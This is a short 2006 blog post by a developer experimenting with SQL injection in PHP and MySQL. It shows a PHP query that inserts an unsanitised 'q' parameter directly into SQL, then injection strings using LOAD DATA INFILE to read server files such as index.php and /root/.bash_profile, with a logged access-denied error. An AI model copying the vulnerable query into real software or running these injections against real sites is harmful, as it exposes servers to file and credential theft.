More on SQL Injection…

In: MySQL|PHP

1 Aug 2006

I wrote this a while ago, whilst playing with SQL Injection, however a little unfinished, the idea was to try to write out entire files, through an SQL Injection attack.

I thought I would expand, on my previous post Exceptions, Exceptions, Exceptions, and see what is possible with a simple a SQL Injection attack. I will base this on the assumption, that if you’ve managed to overlook an arbitry SQL Injection attack, I will assume that there will be vulnerable output somewhere.

  $id = ($_REQUEST['id'])? (int) $_REQUEST['id'] : 0;
  $SearchTerm = (isset($_REQUEST['q']))? $_REQUEST['q'] : null;

  if ( $id!=0 && !empty($SearchTerm) ) {
    $SQL = "SELECT id, StartDate, EndDate, Title FROM Table_One WHERE id={$id} AND Title='{$SearchTerm}';";
    $Query = mysql_query($SQL) or die('Query Error: '.mysql_error());
    $Row = mysql_fetch_array($Query, MYSQL_ASSOC);

    if(!empty($Row['Title'])) {
      print $Row['Title'];
    }
  }

A couple experiments with sql injection.

LOAD%20DATA%20INFILE%20'/home/httpd/vhosts/ajohnstone.com/httpdocs/index.php'%20INTO%20TABLE%20test.OUTRUN;
LOAD DATA INFILE '/root/.bash_profile' INTO TABLE test.OUTRUN;

string(96) "LOAD DATA INFILE '/home/httpd/vhosts/ajohnstone.com/httpdocs/index.php' INTO TABLE test(Output);"
Query Error: Access denied for user 'user@'localhost' (using password: YES)

Comment Form

About this blog

I have been a developer for roughly 10 years and have worked with an extensive range of technologies. Whilst working for relatively small companies, I have worked with all aspects of the development life cycle, which has given me a broad and in-depth experience.